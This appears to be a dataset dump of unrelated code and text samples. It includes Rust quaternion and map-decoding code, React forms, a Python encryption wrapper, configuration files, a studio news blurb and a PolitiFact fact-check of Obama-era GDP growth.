content
stringlengths 10
4.9M
|
---|
//ip Quaternion<F> for QArray
/// `Quaternion` implementation for `QArray`, which stores its four
/// components in the 4-element vector type `V4` (`self.data`).
impl<F, V3, V4> Quaternion<F, V3, V4> for QArray<F, V3, V4>
where
    F: Float,
    V3: Vector<F, 3>,
    V4: Vector<F, 4>,
{
    /// Build a quaternion directly from a 4-element component array.
    fn from_array(data: [F; 4]) -> Self {
        Self::of_vector(V4::from_array(data))
    }
    /// Decompose into `(r, i, j, k)` components (delegates to `quat::as_rijk`).
    fn as_rijk(&self) -> (F, F, F, F) {
        quat::as_rijk(self.data.as_ref())
    }
    /// Build a quaternion from its `(r, i, j, k)` components.
    fn of_rijk(r: F, i: F, j: F, k: F) -> Self {
        Self::from_array(quat::of_rijk(r, i, j, k))
    }
    /// The identity quaternion: r = 1, i = j = k = 0.
    fn unit() -> Self {
        Self::of_rijk(F::one(), F::zero(), F::zero(), F::zero())
    }
    /// Zero every component in place.
    fn set_zero(&mut self) {
        self.data.set_zero();
    }
    /// Component-wise interpolation toward `other` by factor `t`.
    /// NOTE(review): this delegates to the vector `mix` (a lerp), so the
    /// result is not necessarily a unit quaternion — confirm callers
    /// normalize if they need slerp semantics.
    fn mix(&self, other: &Self, t: F) -> Self {
        Self::of_vector(self.data.mix(&other.data, t))
    }
    /// Four-component dot product of the underlying vectors.
    fn dot(&self, other: &Self) -> F {
        vector::dot(self.as_ref(), other.as_ref())
    }
    //fp of_rotation3
    /// Find the quaternion of a Matrix3 assuming it is purely a rotation
    fn of_rotation3<M>(rotation: &M) -> Self
    where
        M: SqMatrix<V3, F, 3, 9>,
    {
        Self::from_array(quat::of_rotation(rotation.as_ref()))
    }
    /// Write this quaternion's rotation into a 3x3 matrix.
    fn set_rotation3<M>(&self, matrix: &mut M)
    where
        M: SqMatrix<V3, F, 3, 9>,
    {
        quat::to_rotation3(self.as_ref(), matrix.as_mut())
    }
    /// Write this quaternion's rotation into a 4x4 (homogeneous) matrix.
    fn set_rotation4<M>(&self, matrix: &mut M)
    where
        M: SqMatrix<V4, F, 4, 16>,
    {
        quat::to_rotation4(self.as_ref(), matrix.as_mut())
    }
}
import React, { useContext } from "react";
import InputTextField from "../../controls/InputTextField";
import { IPropsOrder } from ".";
import { updateAllOrder } from "../../../store/actions/currentOrderActions";
import { CurrentOrderContext } from "../../../store/contexts/CurrentOrderContext";
/**
 * Form for editing the customer attached to the current order.
 * Each change merges the edited field into `order.customerNew` and pushes
 * the whole updated order back to the CurrentOrder store.
 */
export default function CustomerForm({ order }: IPropsOrder) {
  const { customerNew } = order;
  const { dispatch } = useContext(CurrentOrderContext);
  // Typed event instead of `any`; the input's `name` attribute must match
  // the customer property it edits. The original copied `customerNew` into
  // a local and immediately overwrote it — we build the merged object once.
  const onChange = (e: React.ChangeEvent<HTMLInputElement>) => {
    const updatedCustomer = {
      ...customerNew,
      [e.target.name]: e.target.value,
    };
    // Third argument `true` — presumably a "persist/dirty" flag; TODO
    // confirm against updateAllOrder's signature.
    updateAllOrder({ ...order, customerNew: updatedCustomer }, dispatch, true);
  };
  return (
    <div>
      <InputTextField
        value={customerNew.fullName}
        onChange={onChange}
        containerClass="mb-3"
        id="customername"
        name="fullName"
        placeholder="Full name"
      />
      <InputTextField
        onChange={onChange}
        value={customerNew.email}
        containerClass="mb-3"
        id="customeremail"
        name="email"
        placeholder="Email"
      />
      <div className="display-flex">
        <InputTextField
          onChange={onChange}
          value={customerNew.idNumber}
          containerClass="mb-3 mr-2 w-100"
          id="customeridnumber"
          name="idNumber"
          placeholder="ID"
        />
        <InputTextField
          onChange={onChange}
          value={customerNew.phoneNumber}
          containerClass="mb-3 w-100"
          id="customerphone"
          name="phoneNumber"
          placeholder="Phone number"
        />
      </div>
      <InputTextField
        onChange={onChange}
        value={customerNew.address}
        containerClass="mb-3"
        id="customeraddress"
        name="address"
        placeholder="Address"
      />
    </div>
  );
}
|
// EFFECTS: adds to shippingPackages if there is enough space
private void addToShipping(Package p) {
int currentCap = storage.size() + shippingPackages.size();
if (currentCap < MAX_CAPACITY) {
shippingPackages.add(p);
}
} |
def issueunique(self, root_name, asset_tags, ipfs_hashes=None, to_address="", change_address=""):
    """Issue unique (one-of-a-kind) assets under ``root_name`` via the node RPC.

    ``asset_tags`` are stringified before being sent. Returns the issuing
    transaction id converted with ``lx`` (little-endian hex helper —
    TODO confirm exact return type against ``lx``'s definition).
    """
    tags = [str(tag) for tag in asset_tags]
    response = self._call('issueunique', str(root_name), tags, ipfs_hashes,
                          str(to_address), str(change_address))
    return lx(response[0])
// Clang modules test source: re-declarations here must merge with the
// declarations imported from 'redecl_merge_top'. The declarations (and
// their layout — see "Spacing matters!" below) are intentional test
// fixtures; do not "clean up" apparent duplicates.
@import redecl_merge_top;
@class A;
@class A;
@interface B
+ (B*) create_a_B;
@end
@class A;
@protocol P1;
@protocol P2
- (void)protoMethod2;
@end
struct S1;
struct S2 {
int field;
};
struct S1 *produce_S1(void);
void consume_S2(struct S2*);
// Test declarations in different modules with no common initial
// declaration.
@class C;
void accept_a_C(C*);
@class C2;
void accept_a_C2(C2*);
@class C3;
void accept_a_C3(C3*);
@class C3;
@class C4;
@class Explicit;
int *explicit_func(void);
struct explicit_struct;
@protocol P3, P4;
@protocol P3;
struct S3;
struct S3;
struct S4 {
int field;
};
struct S3 *produce_S3(void);
void consume_S4(struct S4*);
typedef int T1;
typedef float T2;
int func0(int);
int func1(int x) { return x; }
int func2(int);
// Spacing matters!
extern int var1;
extern float var2;
extern double var3;
// Make sure this doesn't introduce an ambiguity-creating 'id' at the
// top level.
typedef void funcptr_with_id(int id);
// A class that is declared in the 'bottom' module, then loaded from
// one of the modules it depends on.
@interface DeclaredThenLoaded
- declaredThenLoadedMethod;
@end
@class DeclaredThenLoaded;
void eventually_noreturn2(void);
|
class AESCipher:
    """
    A wrapper around the true python AESCipher.
    This wrapper takes care of properly padding messages, selecting an encryption mode and handling the encryption key.
    It is safe to keep one object because the internal python cipher is not reused.
    """
    def __init__(self, key: str):
        """
        :param key: The passphrase used to encrypt and decrypt messages.
            If it is None (or empty), no encryption/decryption takes place
        """
        # An empty passphrase is treated the same as "no encryption".
        if key is not None and len(key) == 0:
            key = None
        if key is None:
            self.key = None
        else:
            # hash the key so that it has a fixed length and is urlsafe as required by the Fernet cipher
            # NOTE(review): the salt is static and iterations=10000 is low by
            # current password-hashing guidance. Changing either would break
            # compatibility with existing peers, but confirm the threat model
            # before relying on this for real secrecy.
            key = PBKDF2HMAC(
                algorithm=SHA256(),
                length=32,
                salt=b"bit-bots",
                iterations=10000
            ).derive(bytes(key, encoding="UTF-8"))
            self.key = base64.urlsafe_b64encode(key)
    def encrypt(self, message: str) -> bytes:
        """Encrypt ``message``; with no key set, returns it UTF-8 encoded unmodified.

        :raises ValueError: if ``message`` is empty
        """
        if message == "":
            raise ValueError("Cannot encrypt empty message")
        if self.key is None:
            return bytes(message, encoding="UTF-8")
        return Fernet(key=self.key).encrypt(bytes(message, encoding="UTF-8"))
    def decrypt(self, enc: bytes) -> str:
        """Inverse of :meth:`encrypt`.

        :raises ValueError: if ``enc`` is empty
        """
        if len(enc) == 0:
            raise ValueError("Cannot decrypt empty data")
        if self.key is None:
            return str(enc, encoding="UTF-8")
        return str(Fernet(key=self.key).decrypt(enc), encoding="UTF-8")
<filename>src/global.d.ts
/**
 * Define global variables for scripts in the src folder.
 * You can define your own interface.
 * Below is an example of how to call in a React component:
 * @example
 * const { example } = window;
 * example.foo.bar(...);
 * example.ping();
 */
declare global {
  interface Window {
    example: IExample;
    electron: IElectron;
  }
}
// This is an example interface. You can define your own interface.
export interface IExample {
  foo: {
    bar: (...args: any[]) => void;
  };
  ping: () => void;
}
// This is an interface for electron.ipcRenderer
export interface IElectron {
  ipcRenderer: {
    /**
     * Add a listener that listens to a channel.
     * @param channel The channel to listen to.
     * @param listener Listener function.
     * @returns A function that removes the listener when called.
     */
    on: (channel: string, listener: (...args: any[]) => void) => () => void;
    /**
     * Add a listener that listens to a channel. Only triggers once.
     * @param channel The channel to listen to.
     * @param listener Listener function.
     * @returns A function that removes the listener when called.
     */
    once: (channel: string, listener: (...args: any[]) => void) => () => void;
    /**
     * Sends args to the main process via ipcRenderer.send()
     * @param channel
     * @param args
     */
    send: (channel: string, ...args: any[]) => void;
    /**
     * Sends args to the main process via ipcRenderer.invoke()
     * @param channel
     * @param args
     * @returns A promise.
     */
    invoke: (channel: string, ...args: any[]) => Promise<any>;
  };
}
|
/**
 * Unit test running on device or emulator.
 * Created by keisuke on 16/03/03.
 */
@RunWith(AndroidJUnit4.class)
public class PackageNameManagerTest {
    // Instrumentation context of the test APK (not the app under test).
    private Context context;
    @Before
    public void setUp() {
        // getContext() returns the *test* package's context, which is why
        // the ".test" suffix is expected below.
        context = InstrumentationRegistry.getContext();
    }
    @Test
    public void getPackageName_IsCorrect() {
        assertEquals("io.github.kobakei.androidhowtotest.test", PackageNameManager.getPackageName(context));
    }
}
<filename>config.py
# Global configuration for the chess self-play / MCTS trainer.
GameName = 'chess'
GUI_ENABLE = True
# -- path
# Number of Monte-Carlo tree-search simulations per move.
mct_simulate_num = 20
# Exploration probability (presumably epsilon-greedy during self-play —
# TODO confirm where this is consumed).
epsilon = 0.2
cpuct = 0.1 # mct cpuct
# Replay-buffer capacity and SGD settings.
memory_size = 500
batch_size = 50
train_loop = 2
epochs = 3
# init_chess_state = [
# [0, -1, 0],
# [-1, 0, 1],
# [0, 1, 0]
# ]
# question_state = [
# [0, -1, 0],
# [2, 1, 2],
# [-1, 1, 0]
# ]
# Initial board: -1 and 1 are the two players' pieces, 0 is empty.
# (Alternative board layouts are kept commented out below/above.)
init_chess_state = [
[0, -1, 0, 0],
[-1, 0, 0, 1],
[0, 0, 1, 0]
]
# init_chess_state = [
# [0, -1, 0, 0],
# [-1, 0, 0, 0],
# [0, 0, 0, 1],
# [0, 0, 1, 0]
# ]
# board_rows=6
# board_cols=6
# init_chess_state=[
# [0, 0, 0, -1, 0, 0],
# [0, 0, 0, 0, 0, 0],
# [-1, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 1],
# [0, 0, 0, 0, 0, 0],
# [0, 0, 1, 0, 0, 0]
# ]
# Board dimensions are derived from the initial state, so only the
# matrix above needs editing to change the board size.
board_rows = len(init_chess_state)
board_cols = len(init_chess_state[0])
# Threshold used when picking a piece (units unclear — TODO confirm).
pick_piece_thrs = board_rows * board_cols * 8
|
Spring/Summer 2018 Spring/Summer 2018 *WOOT!* Huge congrats and thanks to the Octo-crew - the Octonauts won an ANNIE for "Best Animated Television/Broadcast Production For Preschool Children" and an EMMY for "Outstanding Writing in a Preschool Animated Program" ~ We're currently busy working on more fun underwater adventures. Stay tuned! Winter 2017/18
We've also been working on a project close to our hearts: "The Toughlings" for the Floating Hospital for Children in Boston. We created art for hospital walls, an activity book, web and more.
Happy 10th book birthday to "Sea of Shade"! We're excited that the first four original Octonauts books are now available in a lovely new box set. Season 4 of Octonauts TV is airing world wide and the octo-verse continues to expand into themed hotel rooms, play centers, live musical theatre and more fun toys. Octonauts books are now available in Korean, while Hungarian and Chinese books are coming out in 2018. Woot!We've also been working on a project close to our hearts: "The Toughlings" for the Floating Hospital for Children in Boston. We created art for hospital walls, an activity book, web and more. See some images in our portfolio!
Currently in its 4th season and airing worldwide, the Octonauts animated TV series follows our crew of intrepid explorers as they adventure under the ocean! Follow the Octonauts Facebook or Twitter for news.
import { CourierState } from "../utils/data_parsers";
import { NotificationType } from "../utils/util";
import { NewSubscription } from "./new_subscription";
import { Pull } from "./pull";
import { SubscriptionsTable } from "./subscriptions_table";
interface Props {
  // Current courier snapshot; the subscription map feeds the table below.
  courierState: CourierState;
  // Surface a toast/banner to the user.
  setNotification: (type: NotificationType, message: string) => void;
  // Ask the user to confirm a destructive action before running it.
  setDeleteConfirmation: (message: string, action: () => void) => void;
}
// Tab combining the "new subscription" and "pull" forms with the table of
// existing subscriptions. (Note: `class=` attributes — this is Preact JSX.)
export function SubscriptionsTab(props: Props) {
  return (
    <div>
      <section class="section">
        <div class="container">
          <div class="columns">
            <div class="column">
              <NewSubscription setNotification={props.setNotification} />
            </div>
            <div class="column">
              <Pull setNotification={props.setNotification} />
            </div>
          </div>
        </div>
      </section>
      <section class="section">
        <div class="container">
          <SubscriptionsTable
            subscriptions={Array.from(props.courierState.subscriptionMap.values())}
            setNotification={props.setNotification}
            setDeleteConfirmation={props.setDeleteConfirmation}
          />
        </div>
      </section>
    </div>
  );
}
|
<gh_stars>1-10
import React, { useEffect, useState } from 'react';
import { connect, ConnectedProps } from 'react-redux';
import { useHistory } from 'react-router';
import { Button, Popover, ButtonBase, makeStyles, Theme, createStyles } from '@material-ui/core';
import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
import { useTranslation } from 'react-i18next';
import { AppState } from '../App/reducers';
import { logoutAction } from '../ducks/auth';
import { getUser } from '../services/api/user';
// Styles for the user-badge popover content (Material-UI JSS).
const useStyles = makeStyles((theme: Theme) =>
  createStyles({
    root: {
      display: 'flex',
      flexDirection: 'column',
    },
    content: {
      flexGrow: 1,
      display: 'flex',
      flexDirection: 'column',
    },
    header: {
      marginTop: theme.spacing(2),
      display: 'flex',
      flexDirection: 'column',
      justifyContent: 'space-around',
      alignItems: 'center',
      width: '100%',
    },
    usericon: {
      color: theme.palette.primary.main,
    },
    username: {
      color: theme.palette.primary.main,
      fontSize: '1.2em',
      margin: theme.spacing(1),
    },
    logoutbutton: {
      margin: theme.spacing(1),
    },
  }));
// Redux bindings: expose the authenticated user and the logout action.
const mapState = (state: AppState) => ({
  user: state.auth.user,
});
const mapDispatch = ({
  logout: logoutAction,
});
const connector = connect(mapState, mapDispatch);
type ReduxProps = ConnectedProps<typeof connector>;
type PropTypes = ReduxProps;
// Toolbar badge for the logged-in user: clicking the icon opens a popover
// showing the user's name plus Settings and Logout actions. Renders
// nothing when no user is authenticated.
const UserBadge = (props: PropTypes) => {
  const { user, logout } = props;
  const [t] = useTranslation();
  const classes = useStyles();
  // Popover anchor; null means the popover is closed.
  const [anchorEl, setAnchorEl] = useState<HTMLButtonElement | null>(null);
  const [userName, setUserName] = useState<string>('');
  const history = useHistory();
  const handleClick = (event: React.MouseEvent<HTMLButtonElement>) => {
    setAnchorEl(event.currentTarget);
  };
  const handleClose = () => {
    setAnchorEl(null);
  };
  const settings = () => {
    // Navigate to the /usersettings route
    history.push('/usersettings');
    // Close the menu popover
    handleClose();
  };
  // Fetch the display name whenever the authenticated user changes; the
  // cleanup resets it so a stale name never flashes for the next user.
  useEffect(() => {
    const init = async () => {
      if (user) {
        const respUser = await getUser(user.id);
        setUserName(respUser.name);
      }
    };
    init();
    return () => {
      setUserName('');
    };
  }, [user]);
  const open = Boolean(anchorEl);
  if (!user) {
    return <div />;
  }
  return (
    <>
      <ButtonBase onClick={handleClick}>
        <FontAwesomeIcon size="2x" icon="user" />
      </ButtonBase>
      <Popover
        id="user-badge-content"
        open={open}
        anchorEl={anchorEl}
        onClose={handleClose}
        anchorOrigin={{
          vertical: 'bottom',
          horizontal: 'center',
        }}
        transformOrigin={{
          vertical: 'top',
          horizontal: 'center',
        }}
      >
        <div className={classes.root}>
          <div className={classes.content}>
            <div className={classes.header}>
              <FontAwesomeIcon className={classes.usericon} icon="user-circle" size="3x" />
              <div className={classes.username}>{userName}</div>
            </div>
          </div>
          <Button className={classes.logoutbutton} onClick={settings} variant="contained" color="primary">
            {t('main:settings')}
          </Button>
          <Button className={classes.logoutbutton} onClick={logout} variant="contained" color="primary">
            {t('main:logout')}
          </Button>
        </div>
      </Popover>
    </>
  );
};
export default connector(UserBadge);
|
"The past (Obama) administration was the first administration that never had a whole year of 3 percent growth."
Speaking at an event in Chicago earlier this month, U.S. Rep. Peter Roskam, R-Ill., was talking tax policy and the economy when he pointed to lackluster economic growth that occurred under former President Barack Obama.
"The past (Obama) administration was the first administration that never had a whole year of 3 percent growth," Roskam said during a March 6 speech at the City Club of Chicago.
It’s an oft-cited figure Republicans tend to throw around to highlight the weak economic recovery throughout Obama’s presidency, but does the data back it up?
A familiar claim
Roskam’s claim lacks some specifics, particularly the type of growth and time frame he was referring to in his speech.
David Pasch, the Wheaton Republican’s communications director, provided a link to data compiled by the Bureau of Economic Analysis showing both the annual and quarterly percentage change in real gross domestic product, or GDP, which is the total value of goods and services provided in the country.
While annual figures on GDP growth date back to the Herbert Hoover administration and the onset of the Great Depression in 1929, the federal government did not start tracking quarterly growth until 1947.
Considering the time frame for which this annual data is available, it’s safe to assume Roskam was referring to economic growth since the Hoover administration.
In fact, Roskam’s claim is quite similar to a statement Donald Trump made during a campaign speech in October, which was fact-checked by our colleague Joshua Gillin at PolitiFact Florida.
As was the case with Trump’s claim, Roskam is right when he says that year-over-year GDP growth never topped 3 percent while Obama was in office.
But as Princeton University economist Alan Blinder told PolitiFact at the time, looking at annual data can be misleading because it doesn’t provide context or account for historical factors that affect economic growth, such as recessions and global crises. For example, Hoover came into office on the cusp of the Great Depression, and Obama took over during the tail end of the Great Recession and amid instability in the Middle East.
That’s one of the main reasons why economists suggest looking at the percentage change in GDP by quarters, rather than growth in a single calendar year.
When PolitiFact Florida fact-checked Trump saying Obama was the first president "in modern history not to have a single year of 3 percent growth," data for the third and fourth quarters of 2016 was not yet available.
But now it is.
GDP growth in 2016 and the Obama years
According to the Bureau of Economic Analysis, the percentage change in GDP growth during the third and fourth quarters of the last year of Obama’s final term was 3.5 percent and 1.9 percent, respectively, resulting in an average growth rate of 1.6 percent for 2016.
That was down 1 percentage point from 2015 when GDP grew by 2.6 percent, which marked the best year for average growth under Obama.
Typically, economic growth in the first quarter of a new presidency is attributed to the previous administration, meaning former President George W. Bush gets credit for the 5.4 percent contraction in the economy during the first three months of 2009.
As for the remainder of Obama’s time in office, quarterly GDP growth averaged 2.0 percent, or 1.5 percent when averaging out annual figures.
But if the data is used to compare one quarter to the same quarter from a year ago, there were two periods during Obama’s tenure in which growth exceeded 3 percent. Between the third quarters of 2009 and 2010, GDP growth was about 3.1 percent; and between the first quarters of 2014 and 2015, the economy grew by 3.3 percent, according to the Bureau of Economic Analysis.
With the way Roskam refers to growth, however, Obama indeed was the first president who did not achieve more than 3 percent growth in GDP. Average growth under George W. Bush was 2.1 percent; 3.9 percent for Bill Clinton; 2.3 percent for George H.W. Bush; and 3.5 percent for Ronald Reagan.
The highest annual growth on record occurred in 1942 during the Franklin D. Roosevelt administration, when GDP grew by a staggering 18.9 percent as the United States entered World War II and ramped up production following the Dec. 7, 1941, attack on Pearl Harbor.
Our ruling
Roskam said the Obama "administration was the first administration that never had a whole year of 3 percent growth."
While Roskam’s claim is accurate when based on annual GDP growth figures between 2009 and 2016, there are other ways to look at the data, such as from one quarter to the same in the previous year. Doing so reveals economic growth has surpassed 3 percent during two periods of Obama’s presidency.
We rate Roskam’s claim Mostly True. |
/// In SnapshotManager's new function we create a new snapshop manager by
/// parsing the /proc/id/maps of the process id in question.
pub fn new(pid: i32) -> SnapshotManager {
// form the absolute path to the process maps
let mappath = format!("/proc/{}/maps",pid);
// read the maps contents of the process
let map = read_to_string(&mappath).unwrap();
// lets keep a holding area for all the snapshot structs
let mut memspaces: Vec<Snapshot> = Vec::new();
// We have the maps contents of the process in a string, lets parse it
// First we go line by line
for line in map.lines() {
// Then for each line lets collect all the columns
let columns: Vec<&str> = line.split_whitespace().collect();
// Next we parse each column into their respective variables
let startendaddrs: Vec<&str> = columns[0].split("-").collect();
let startaddr: u64 = u64::from_str_radix(startendaddrs[0],16).expect("Issue parsing map start address");
let endaddr: u64 = u64::from_str_radix(startendaddrs[1],16).expect("Issue parsing map end address");
let permissions = columns[1];
let offset: u64 = u64::from_str_radix(columns[2],16).expect("Issue parsing map offset");
let device = columns[3];
let inode: u32 = columns[4].parse().expect("Issue parsing map inode");
let name = if columns.len() < 6 {
""
} else {
columns[5]
};
// Lastly we create a new Snapshot struct with all our attribute we parsed for this memory region
let snap = Snapshot {
pid: pid,
startaddr: startaddr,
endaddr: endaddr,
size: (endaddr-startaddr) as usize,
permissions: permissions.to_string(),
offset: offset,
device: device.to_string(),
inode: inode,
name: name.to_string(),
localsave: Vec::new(),
writable: true,
};
// We keep a growing pool of these Snapshot structs
memspaces.push(snap);
}
// Lastly we return the SnapshotManager
SnapshotManager {
pid: pid,
memspaces: memspaces,
regs: ptrace::getregs(Pid::from_raw(pid)).unwrap()
}
} |
import pytest

# Test cases: (range operator, expected best match, candidate versions).
# Renamed from `cands` so the module-level list no longer shadows the
# per-case `cands` parameter below.
# https://github.com/podhmo/python-node-semver/issues/5
CASES = [
    ["<=1.2", "1.2.0", ["1.1.1", "1.2.0-pre", "1.2.0", "1.1.1-111", "1.1.1-21"]],
    ["<=1.2", "1.2", ["1.1.1", "1.2.0-pre", "1.2", "1.1.1-111", "1.1.1-21"]],
    ["<=1.2.0", "1.2.0", ["1.1.1", "1.2.0-pre", "1.2.0", "1.1.1-111", "1.1.1-21"]],
    ["<=1.2.0", "1.2", ["1.1.1", "1.2.0-pre", "1.2", "1.1.1-111", "1.1.1-21"]],
]


@pytest.mark.parametrize("op, wanted, cands", CASES)
def test_it(op, wanted, cands):
    """max_satisfying picks the highest candidate satisfying `op`,
    ignoring pre-release versions in loose mode."""
    from nodesemver import max_satisfying

    got = max_satisfying(cands, op, loose=True)
    assert got == wanted
|
<gh_stars>1-10
#ifndef _OPTION_H
#define _OPTION_H
#include <iostream>
#include <map>    // fixed: std::map was used without including <map>
#include <string> // fixed: std::string was used without including <string>
using namespace std;

// Thin wrapper around std::map<std::string, G_Type>, keyed by option name.
template <class G_Type>
class COptionMap
{
public:
	COptionMap();
	~COptionMap();
	// Insert a mapping from strOpt to item.
	// NOTE: std::map::insert keeps an existing entry — inserting the same
	// key twice does NOT overwrite the first value (original behaviour).
	void InsertOptMap(std::string strOpt, const G_Type item);
	// Copy the value stored under strOpt into item; item is left
	// untouched when the key is absent.
	void GetOptMap(std::string strOpt, G_Type &item);
private:
	std::map<std::string, G_Type> optmap_;
};
template <class G_Type>
COptionMap<G_Type>::COptionMap()
{
}
template <class G_Type>
COptionMap<G_Type>::~COptionMap()
{
}
template <class G_Type>
void COptionMap<G_Type>::InsertOptMap(std::string strOpt, const G_Type item)
{
	pair<std::string, G_Type> abc(strOpt, item);
	optmap_.insert(abc);
}
template <class G_Type>
void COptionMap<G_Type>::GetOptMap(std::string strOpt, G_Type &item)
{
	// fixed: 'typename' is required — map<...>::iterator is a dependent
	// type inside a template, so the original did not compile on
	// conforming compilers.
	typename std::map<std::string, G_Type>::iterator it = optmap_.find(strOpt);
	if (it != optmap_.end())
	{
		item = it->second;
	}
}
#endif // !_OPTION_H
|
use std::convert::TryFrom;
use fujiformer_geom::{IntRect, Point, Rect, Size};
use log::warn;
use thiserror::Error;
use crate::{internal::Node, CelesteMap};
/// A single room ("level") in a Celeste map: its name, its bounding
/// rectangle, and any undecoded attributes kept in `unread` — presumably
/// so they round-trip on re-encode (TODO confirm).
#[derive(Debug, Clone)]
pub struct Screen {
    name: String,
    rect: IntRect,
    unread: Node,
}
impl Screen {
    /// Create a screen backed by a fresh, empty "level" node.
    pub fn new(name: String, rect: IntRect) -> Self {
        Screen {
            name,
            rect,
            unread: Node::new("level".into()),
        }
    }
    /// The screen's bounding rectangle (copied out).
    pub fn shape(&self) -> IntRect {
        self.rect
    }
    /// Mutable access to the screen's bounding rectangle.
    pub fn shape_mut(&mut self) -> &mut IntRect {
        &mut self.rect
    }
}
#[derive(Error, Debug)]
pub enum ScreensDecodeError {
#[error("missing levels node")]
MissingLevelsNode,
#[error("level missing name")]
MissingName,
#[error("level name not int")]
NameNotString,
#[error("level missing x value")]
MissingX,
#[error("level x value not int")]
XNotInt,
#[error("level missing y value")]
MissingY,
#[error("level y value not int")]
YNotInt,
#[error("level missing width value")]
MissingWidth,
#[error("level width not int")]
WidthNotInt,
#[error("level missing height value")]
MissingHeight,
#[error("level height not int")]
HeightNotInt,
}
/// Decode every `level` child of the map's `levels` node into a `Screen`
/// and push it onto `map.screens_mut()`.
///
/// Recognised properties (`name`, `x`, `y`, `width`, `height`) are removed
/// from the child node; everything else is retained on the node so unknown
/// data survives a decode/encode round trip.
pub fn decode_screens(map: &mut CelesteMap) -> Result<(), ScreensDecodeError> {
    let mut node = map
        .unread
        .take_child_with_name("levels")
        .ok_or(ScreensDecodeError::MissingLevelsNode)?;
    for mut child in std::mem::take(node.children_mut()).into_iter() {
        if child.name() != "level" {
            // Fixed: the message previously said "rect" even though this
            // branch checks for "level" nodes.
            warn!("expected \"level\", got {}", child.name());
        }
        // Each slot is None (property missing), Some(Err(..)) (present but
        // the wrong type) or Some(Ok(..)) — hence the double `?` below.
        let (mut name, mut x, mut y, mut width, mut height) = (None, None, None, None, None);
        child.properties_mut().retain(|(key, value)| {
            match key.as_str() {
                "name" => {
                    name = Some(
                        String::try_from(value.clone())
                            .map_err(|_| ScreensDecodeError::NameNotString),
                    )
                }
                "x" => x = Some(i32::try_from(value).map_err(|_| ScreensDecodeError::XNotInt)),
                "y" => y = Some(i32::try_from(value).map_err(|_| ScreensDecodeError::YNotInt)),
                "width" => {
                    width = Some(u32::try_from(value).map_err(|_| ScreensDecodeError::WidthNotInt))
                }
                "height" => {
                    height =
                        Some(u32::try_from(value).map_err(|_| ScreensDecodeError::HeightNotInt))
                }
                // Unknown property: keep it on the node.
                _ => return true,
            };
            // Recognised property: drop it from the node.
            false
        });
        let (name, x, y, width, height) = (
            name.ok_or(ScreensDecodeError::MissingName)??,
            x.ok_or(ScreensDecodeError::MissingX)??,
            y.ok_or(ScreensDecodeError::MissingY)??,
            width.ok_or(ScreensDecodeError::MissingWidth)??,
            height.ok_or(ScreensDecodeError::MissingHeight)??,
        );
        map.screens_mut().push({
            let mut screen =
                Screen::new(name, Rect::new(Point::new(x, y), Size::new(width, height)));
            // Preserve whatever we did not decode for later re-encoding.
            screen.unread = child;
            screen
        });
    }
    Ok(())
}
|
// TagSet (leaf): Use the referenced tag-set to set tags on the prefixes that match the
// specified conditions. When a tag is set it MUST be possible to match the
// value set in subsequent policies on the local device. where the protocol that
// is carrying the prefix has a tag field (OSPF, and IS-IS for in particular)
// the tag MUST be set in the corresponding protocol advertisements of the
// prefix.
// ----------------------------------------
// Defining module: "openconfig-routing-policy"
// Instantiating module: "openconfig-routing-policy"
// Path from parent: "state/tag-set"
// Path from root: "/routing-policy/policy-definitions/policy-definition/statements/statement/actions/set-tag/reference/state/tag-set"
//
// NOTE(review): this accessor appears to be ygot/ygen generated code —
// manual edits are normally overwritten by the generator; confirm before
// changing by hand.
func (n *RoutingPolicy_PolicyDefinition_Statement_Actions_SetTag_ReferencePath) TagSet() *RoutingPolicy_PolicyDefinition_Statement_Actions_SetTag_Reference_TagSetPath {
	// Extend the parent path with the "state/tag-set" schema elements; no
	// list keys apply at this node (empty key map).
	return &RoutingPolicy_PolicyDefinition_Statement_Actions_SetTag_Reference_TagSetPath{
		NodePath: ygot.NewNodePath(
			[]string{"state", "tag-set"},
			map[string]interface{}{},
			n,
		),
	}
}
#!/usr/bin/env python3
"""Regenerate the Gir_Gst* crates with the bundled `gir` code generator."""
from os import listdir
from os.path import isdir, isfile, join
from subprocess import call
import sys

need_rebuild = False


def update_workspace():
    """Build the gir generator in release mode; return True on success."""
    try:
        call(['bash', '-c', 'cd gir && cargo build --release'])
    except Exception:
        # Treat any failure to launch the build as "build failed".
        return False
    return True


# `gir/src` is a *directory* once the submodule is checked out. The original
# used isfile() here, which is always False for a directory and therefore
# re-initialized the submodule on every run.
if not isdir('./gir/src'):
    need_rebuild = True
    print('=> Initializing gir submodule...')
    call(['bash', '-c', 'git submodule update --init'])
    print('<= Done!')

question = 'Do you want to update gir submodule? [y/N] '
if sys.version_info[0] < 3:
    # Python 2 fallback kept for callers running an old interpreter.
    line = raw_input(question)  # noqa: F821
else:
    line = input(question)
line = line.strip()
if line.lower() == 'y':
    need_rebuild = True
    print('=> Updating gir submodule...')
    call(['bash', '-c', 'cd gir && git reset --hard HEAD && git pull -f origin master'])
    print('<= Done!')

# Fixed: the original referenced os.path.isfile without importing os,
# which raised NameError; use the already-imported isfile instead.
if need_rebuild or not isfile('./gir/target/release/gir'):
    print('=> Building gir...')
    if update_workspace():
        print('<= Done!')
    else:
        print('<= Failed...')
        sys.exit(1)

print('=> Regenerating crates...')
for entry in [f for f in listdir('.') if isfile(join('.', f))]:
    if entry.startswith('Gir_Gst') and entry.endswith('.toml'):
        print('==> Regenerating "{}"...'.format(entry))
        try:
            call(['./gir/target/release/gir', '-c', entry])
        except Exception as err:
            print('The following error occurred: {}'.format(err))
            line = input('Do you want to continue? [y/N] ').strip().lower()
            if line != 'y':
                sys.exit(1)
        print('<== Done!')
call(['cargo', 'fmt'])
print('<= Done!')
print("Don't forget to check if everything has been correctly generated!")
|
/**
 * Implementation based on the Raml 1.0 Parser
 *
 * @author Aleksandar Stojsavljevic
 * @since 0.10.0
 */
public class RJP10V2RamlSecurityReference implements RamlSecurityReference {
    // Underlying RAML parser reference; may be null when no scheme is set.
    private final SecuritySchemeRef securitySchemeRef;
    public RJP10V2RamlSecurityReference(SecuritySchemeRef securityReferenceRef) {
        this.securitySchemeRef = securityReferenceRef;
    }
    /** Name of the referenced security scheme, or null when none is set. */
    @Override
    public String getName() {
        if (this.securitySchemeRef == null) {
            return null;
        }
        return this.securitySchemeRef.name();
    }
    public SecuritySchemeRef getSecuritySchemeRef() {
        return this.securitySchemeRef;
    }
    /**
     * OAuth 2.0 authorization grants declared on the reference.
     * Returns an empty list for any scheme other than "oauth_2_0" or when
     * the reference carries no structured settings.
     */
    @Override
    public List<String> getAuthorizationGrants() {
